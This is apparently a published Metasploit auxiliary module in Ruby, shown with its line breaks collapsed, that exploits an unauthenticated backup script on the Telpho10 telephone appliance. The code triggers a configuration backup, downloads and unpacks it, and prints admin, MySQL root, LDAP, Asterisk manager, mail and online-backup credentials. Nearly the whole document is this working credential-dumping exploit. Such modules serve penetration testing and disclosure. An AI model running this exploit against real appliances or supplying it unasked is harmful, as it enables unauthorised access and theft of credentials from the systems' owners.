Headline
Telpho10 Backup Credentials Dumper
This Metasploit module exploits a vulnerability present in all versions of Telpho10 telephone system appliance. This Metasploit module generates a configuration backup of Telpho10, downloads the file and dumps the credentials for admin login, phpmyadmin, phpldapadmin, etc. This Metasploit module has been successfully tested on the appliance versions 2.6.31 and 2.6.39.
### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super( update_info( info, 'Name' => 'Telpho10 Backup Credentials Dumper', 'Description' => %q{ This module exploits a vulnerability present in all versions of Telpho10 telephone system appliance. This module generates a configuration backup of Telpho10, downloads the file and dumps the credentials for admin login, phpmyadmin, phpldapadmin, etc. This module has been successfully tested on the appliance versions 2.6.31 and 2.6.39. }, 'Author' => 'Jan Rude', # Vulnerability Discovery and Metasploit Module 'License' => MSF_LICENSE, 'References' => ['URL', 'https://github.com/whoot/TelpOWN'], 'Platform' => 'linux', 'Privileged' => false, 'DisclosureDate' => '2016-09-02' ) ) register_options( [ Opt::RPORT(80) ] ) end # Used for unpacking backup files def untar(tarfile) destination = tarfile.split('.tar').first FileUtils.mkdir_p(destination) File.open(tarfile, 'rb') do |file| Rex::Tar::Reader.new(file) do |tar| tar.each do |entry| dest = File.join(destination, File.basename(entry.full_name)) next unless entry.file? File.open(dest, 'wb') do |f| f.write(entry.read) end File.chmod(entry.header.mode, dest) end end end return destination end # search for credentials in backup file def dump_creds(mysql_file) file = File.new(mysql_file, 'r') while (line = file.gets) if line.include? 'adminusername' config = [line] end end file.close print_status('Login (/telpho/login.php)') print_status('-------------------------') print_good("Username: #{config.first[/adminusername','(.*?)'/, 1]}") print_good("Password: #{config.first[/adminpassword','(.*?)'/, 1]}\n") print_status('MySQL (/phpmyadmin)') print_status('-------------------') print_good('Username: root') print_good("Password: #{config.first[/dbpassword','(.*?)'/, 1]}\n") print_status('LDAP (/phpldapadmin)') print_status('--------------------') print_good('Username: cn=admin,dc=localdomain') print_good("Password: #{config.first[/ldappassword','(.*?)'/, 1]}\n") print_status('Asterisk MI (port 5038)') print_status('-----------------------') print_good("Username: #{config.first[/manageruser','(.*?)'/, 1]}") print_good("Password: #{config.first[/managersecret','(.*?)'/, 1]}\n") print_status('Mail configuration') print_status('------------------') print_good("Mailserver: #{config.first[/ipsmarthost','(.*?)'/, 1]}") print_good("Username: #{config.first[/mailusername','(.*?)'/, 1]}") print_good("Password: #{config.first[/mailpassword','(.*?)'/, 1]}") print_good("Mail from: #{config.first[/mailfrom','(.*?)'/, 1]}\n") print_status('Online Backup') print_status('-------------') print_good("ID: #{config.first[/ftpbackupid','(.*?)'/, 1]}") print_good("Password: #{config.first[/ftpbackuppw','(.*?)'/, 1]}\n") end def run res = send_request_cgi({ 'uri' => '/telpho/system/backup.php', 'method' => 'GET' }) if res && res.code == 200 print_status('Generating backup') sleep(1) else print_error('Could not find vulnerable script. Aborting.') return nil end print_status('Downloading backup') res = send_request_cgi({ 'uri' => '/telpho/temp/telpho10.epb', 'method' => 'GET' }) if res && res.code == 200 if res.body.to_s.bytesize == 0 print_error('0 bytes returned, file does not exist or is empty.') return nil end path = store_loot( 'telpho10.backup', 'application/x-compressed', datastore['RHOST'], res.body, 'backup.tar' ) print_good("File saved in: #{path}") begin extracted = untar(path.to_s) mysql = untar("#{extracted}/mysql.tar") rescue StandardError print_error('Could not unpack files.') return nil end begin print_status("Dumping credentials\n") dump_creds("#{mysql}/mysql.epb") rescue StandardError print_error('Could not find credential file.') return nil end else print_error('Failed to download backup file.') return nil end rescue ::Rex::ConnectionError print_error("#{rhost}:#{rport} - Failed to connect") return nil endend